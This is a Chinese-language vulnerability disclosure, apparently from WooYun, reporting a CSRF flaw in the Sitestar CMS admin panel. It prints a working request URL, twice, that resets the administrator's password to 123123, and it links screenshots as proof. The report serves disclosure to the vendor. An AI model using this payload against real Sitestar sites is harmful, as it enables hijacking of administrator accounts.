建站之星Sitestar设计缺陷可CSRF修改管理员密码

### 简要描述： 没有技术含量的洞。~！~ ### 详细说明： [WooYun: 建站之星敏感功能csrf 可dump数据库](http://www.wooyun.org/bugs/wooyun-2014-068706) 对于这个洞中厂商的回复感觉坑爹，再来一处CSRF提醒下厂商。 强烈建议查下CSRF的介绍。 ``` /admin/index.php?_m=mod_user&_a=admin_update&user[id]=1&passwd[passwd]=123123&passwd[re_passwd]=123123&user[email]=admin@admin.com&user[active]=1&user[s_role]=admin&user[full_name]=&user[mobile]=&submit=%E4%BF%9D%E5%AD%98 ``` 该链接直接修改管理员密码为123123 ### 漏洞证明： ``` /admin/index.php?_m=mod_user&_a=admin_update&user[id]=1&passwd[passwd]=123123&passwd[re_passwd]=123123&user[email]=admin@admin.com&user[active]=1&user[s_role]=admin&user[full_name]=&user[mobile]=&submit=%E4%BF%9D%E5%AD%98 ``` [<img src="https://images.seebug.org/upload/201408/16143621ea99daaffe76ec094b93b194ffc07e5c.jpg" alt="QQ截图20140816143807.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/16143621ea99daaffe76ec094b93b194ffc07e5c.jpg) [<img src="https://images.seebug.org/upload/201408/16143803229813286d08cfe3835486c50f8cb7b4.jpg" alt="QQ截图20140816144000.jpg" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201408/16143803229813286d08cfe3835486c50f8cb7b4.jpg)